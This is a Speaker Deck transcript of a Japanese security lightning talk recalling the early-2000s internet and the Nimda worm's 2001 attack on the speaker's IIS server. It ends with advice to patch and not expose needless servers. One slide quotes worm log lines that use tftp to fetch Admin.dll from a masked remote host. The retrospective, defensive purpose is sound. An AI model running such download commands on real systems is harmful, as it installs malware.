Upgrade to Pro — share decks privately, control downloads, hide ads and more …

あの頃(2000年頃)のインターネット / The Internet in the early...

tkito
January 23, 2025
Technology
1
100

あの頃(2000年頃)のインターネット / The Internet in the early 2000s

2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。

tkito

January 23, 2025
Tweet

More Decks by tkito

See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
tkito
0
800
Re: SQLiから始めるRCE生活 / RCE via SQLi
tkito
0
270
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
tkito
1
2.7k
Linuxでの権限昇格 / Privilege Escalation in Linux
tkito
0
740
SOC-IRとOSCP / SOC-IR and OSCP
tkito
0
110

Other Decks in Technology

See All in Technology
Dapr For Java Developers SouJava 25
salaboy
1
130
17年のQA経験が導いたスクラムマスターへの道 / 17 Years in QA to Scrum Master
toma_sm
0
420
お問い合わせ対応の改善取り組みとその進め方
masartz
1
420
[CATS]Amazon Bedrock GenUハンズオン座学資料 #2 GenU環境でRAGを体験してみよう
tsukuboshi
0
150
ソフトウェアプロジェクトの成功率が上がらない原因-「社会価値を考える」ということ-
ytanaka5569
0
130
「ラベルにとらわれない」エンジニアでいること/Be an engineer beyond labels
kaonavi
0
170
銀行でDevOpsを進める理由と実践例 / 20250317 Masaki Iwama
shift_evolve
1
110
チームの性質によって変わる ADR との向き合い方と、生成 AI 時代のこれから / How to deal with ADR depends on the characteristics of the team
mh4gf
4
340
KCD Brazil '25: Enabling Developers with Dapr & Backstage
salaboy
1
130
ひまプロプレゼンツ 「エンジニア格付けチェック 〜春の公開収録スペシャル〜」
kaaaichi
0
170
Medmain FACTBOOK
akinaootani
0
120
Proxmox VE超入門 〜 無料で作れるご自宅仮想化プラットフォームブックマークする
devops_vtj
0
180

Featured

See All Featured
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
12
1.4k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
331
21k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
120k
Put a Button on it: Removing Barriers to Going Fast.
kastner
60
3.8k
Mobile First: as difficult as doing things right
swwweet
223
9.5k
Imperfection Machines: The Place of Print at Facebook
scottboms
267
13k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
7.1k
GitHub's CSS Performance
jonrohan
1030
460k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
2.9k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.5k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
233
17k
GraphQLとの向き合い方2022年版
quramy
45
14k

Transcript

  1. あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう

  2. 自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり

    2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット

  3. あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます

  4. 私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •

    ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀

  5. 事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5

  6. Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理

    - @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html

  7. 何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット

    7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll

  8. どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8

  9. あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL

    Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9

  10. 昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10

  11. Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)

  12. まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット

    12

  13. おしまい きとう @tkito 13